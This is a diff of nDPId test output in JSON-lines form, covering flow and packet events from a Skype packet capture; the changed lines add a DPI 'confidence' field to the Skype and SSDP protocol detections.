-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5mqYAAEARlXzAqAEinTfrjzLdnF4AJa4yescCvwHYJJA0SDNaHmIGriSDO5fklPid0RnUmyQ="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1cmsAAEARiRbAqAEib91NjzLdnFYAIbzweskC5JgrRdKtWjAuXzT2S5r85LjjhllfqQ=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA42pAAAEARJFHAqAEib91KLDLdnFMAJIhoessC81Jpsjijfp0Q\/Q0jMgS+1lTSx5HXr8lZjQ=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zV0AAEARYhbAqAEi1cezrTLdnE0AJlZnes0Ccg7v+3Lfid3osaqIFpFm\/v4o\/QqgzaHMxbGQ"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.173","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1vrcAAEARJFjAqAEinTc4pzLdnFgAIREees8CCCEtcEeglQLd7mhp21iK7rcni5fedw=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.167","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9vysAAEARohHAqAEiQAQXpTLdnEQAKTALetECX1BVIaBDDxsr7kKWybF1ggh0MeIv40Hl0rhawj9H"}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4G6EAAEARfQHAqAEiQTffETLdnFkAJOrWetMCvMga3ljFR4ptkQ1XTBYwQJAI0\/6MTBVdPQ=="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1431970647810,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970647810,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1FVUAAEARg0\/AqAEiQTffEjLdgQkAIczZetUCcHkMN3GT\/RrB0G0KocMuGJme8meMAw=="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970647810,"flow_last_seen":1431970647810,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970647810,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648367,"flow_last_seen":1431970648367,"flow_idle_time":180000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1431970648367,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431970648367,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"ts_msec":1431970648367,"pkt":"AQBef\/\/6oPPBbTu2CABFAAE\/BH4AAAQR\/4\/AqAD+7\/\/\/+gQBB2wBK+71Tk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVwbnA6cm9vdGRldmljZQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cG5wOnJvb3RkZXZpY2UNCg0K"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648367,"flow_last_seen":1431970648367,"flow_idle_time":180000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1431970648367,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648367,"flow_last_seen":1431970648367,"flow_idle_time":180000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1431970648367,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"239.255.255.250","src_port":1025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00857{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1431970648368,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":351,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":351,"pkt_l4_len":317,"ts_msec":1431970648368,"pkt":"AQBef\/\/6oPPBbTu2CABFAAFRBH8AAAQR\/3zAqAD+7\/\/\/+gQBB2wBPQhzTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxDQpOVFM6IHNzZHA6YWxpdmUNClNFUlZFUjogVFAtTElOSyBXaXJlbGVzcyBOIE5hbm8gUm91dGVyIFdSNzAyTiwgVVBuUC8xLjANClVTTjogdXVpZDp1cG5wLUludGVybmV0R2F0ZXdheURldmljZS0xOTIxNjgwMjU0Nzg5MDAwMDENCg0K"}
 00929{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1431970648368,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":405,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":405,"pkt_l4_len":371,"ts_msec":1431970648368,"pkt":"AQBef\/\/6oPPBbTu2CABFAAGHBIAAAAQR\/0XAqAD+7\/\/\/+gQBB2wBc+ePTk9USUZZICogSFRUUC8xLjENCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpDQUNIRS1DT05UUk9MOiBtYXgtYWdlPTEwMA0KTE9DQVRJT046IGh0dHA6Ly8xOTIuMTY4LjAuMjU0OjE5MDAvaWdkLnhtbA0KTlQ6IHVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpJbnRlcm5ldEdhdGV3YXlEZXZpY2U6MQ0KTlRTOiBzc2RwOmFsaXZlDQpTRVJWRVI6IFRQLUxJTksgV2lyZWxlc3MgTiBOYW5vIFJvdXRlciBXUjcwMk4sIFVQblAvMS4wDQpVU046IHV1aWQ6dXBucC1JbnRlcm5ldEdhdGV3YXlEZXZpY2UtMTkyMTY4MDI1NDc4OTAwMDAxOjp1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCg0K"}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970648822,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.32","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1431970648822,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970648822,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/tTsAAEAR41DAqAEiQTffIDLdnFYAK5o2etcCQsTVfNgeznDqGm3ssKnJOluDwQd072c+I4wlse7Ecr8="}
